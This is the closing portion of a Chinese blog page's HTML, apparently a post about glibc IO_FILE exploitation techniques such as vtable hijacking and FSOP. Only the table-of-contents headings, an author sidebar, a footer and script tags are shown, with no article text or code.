          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%94%E8%AE%B0"><span class="nav-number">1.</span> <span class="nav-text">笔记</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pwn-debug%E7%94%9F%E6%88%90fake-IO-FILE"><span class="nav-number">2.</span> <span class="nav-text">pwn_debug生成fake_IO_FILE</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8A%AB%E6%8C%81vtable"><span class="nav-number"></span> <span class="nav-text">劫持vtable</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BE%8B%E5%A6%82"><span class="nav-number">0.1.</span> <span class="nav-text">例如</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#FSOP"><span class="nav-number"></span> <span class="nav-text">FSOP</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98%E4%B8%80"><span class="nav-number">1.</span> <span class="nav-text">例题一</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#glibc-2-24-%E4%B8%8B-IO-FILE-%E7%9A%84%E5%88%A9%E7%94%A8"><span class="nav-number"></span> <span class="nav-text">glibc 2.24 下 IO_FILE 的利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9-IO-FILE%E5%AE%8C%E6%88%90%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E8%AF%BB%E5%86%99"><span class="nav-number">1.</span> <span class="nav-text">修改_IO_FILE完成任意地址读写</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#demo"><span class="nav-number">1.1.</span> <span class="nav-text">demo</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#IO-str-jumps"><span class="nav-number">2.</span> <span class="nav-text">_IO_str_jumps</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#IO-str-overflow"><span class="nav-number">2.1.</span> <span class="nav-text">_IO_str_overflow</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AE%9A%E4%BD%8D-IO-str-jumps"><span class="nav-number">2.2.</span> <span class="nav-text">定位_IO_str_jumps</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">60</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">40</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
